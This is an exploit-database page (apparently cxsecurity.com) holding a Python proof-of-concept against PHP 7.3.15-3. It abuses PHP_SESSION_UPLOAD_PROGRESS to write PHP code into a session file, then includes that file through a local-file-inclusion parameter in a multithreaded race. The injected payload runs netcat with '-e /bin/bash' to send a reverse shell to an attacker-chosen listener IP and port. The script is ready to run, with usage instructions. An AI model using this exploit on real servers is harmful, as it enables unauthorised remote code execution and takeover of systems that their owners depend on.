PHP 7.3.15-3 PHP_SESSION_UPLOAD_PROGRESS Session Data Injection

2021.07.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection # Date: 26/7/2021 # Exploit Author: SiLvER | Faisal Alhadlaq # Tested on: PHP Version is 7.3.15-3 # This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat #!/usr/bin/python3 """ Usage : python3 poc.p <Target URL> <ListnerIP> <ListnerPORT> python3 poc.py https://xyz.xyz 192.168.1.15 1337 """ import requests import threading import datetime import sys x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) newDatetime = x + addSeconds def fuzz(): targetIP = sys.argv[1] listnerIP = sys.argv[2] listnerPORT = sys.argv[3] global newDatetime while True: try: if datetime.datetime.now() > newDatetime: exit() # proxies = { # "http": "http://127.0.0.1:8080", # "https": "https://127.0.0.1:8080", # } sessionName = "SiLvER" url = targetIP s = requests.Session() cookies = {'PHPSESSID': sessionName} files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')} # You need to change the parameter in your case , here the vulnerabile parameter is (lfi) params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),) x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n") threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) < 4: print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) By SiLvER \n") exit() else: main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top